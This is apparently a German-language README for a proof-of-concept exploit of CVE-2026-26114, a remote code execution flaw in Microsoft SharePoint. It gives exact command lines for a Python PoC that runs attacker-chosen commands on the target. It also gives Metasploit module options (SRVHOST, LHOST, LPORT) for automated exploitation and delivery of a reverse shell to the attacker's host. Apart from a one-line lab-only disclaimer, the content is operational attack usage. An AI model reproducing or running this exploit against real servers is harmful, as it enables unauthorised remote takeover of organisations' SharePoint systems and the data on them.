Proof-of-Concept-Exploit für CVE-2026-26114, eine Sicherheitslücke zur Remotecodeausführung in Microsoft SharePoint, mit einem Python-PoC und Metasploit-Modul für automatisierte Ausnutzung und Reverse-Shell-Übermittlung.
Nur in Laboren oder autorisierten Testsystemen verwenden.
pip install requests requests-ntlm
python poc/cve_2026_26114_rce.py ^
--target http://sharepoint.local ^
--username sp_user1 ^
--password "Password123!" ^
--domain SP19 ^
--cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"
Kann mit --proxy http://127.0.0.1:8080, --insecure verwendet werden, oder ersetzen Sie --cmd durch --marker-file C:\Windows\Temp\marker.txt.
Das Modul befindet sich unter:
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb
Beispiel-Optionen:
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run
Wenn Sie die automatische Erkennung nicht verwenden, setzen Sie zusätzlich TAXONOMY_STORE_ID, TAXONOMY_GROUP_ID, SITE_ID, WEB_ID, JOB_CREATOR_ID.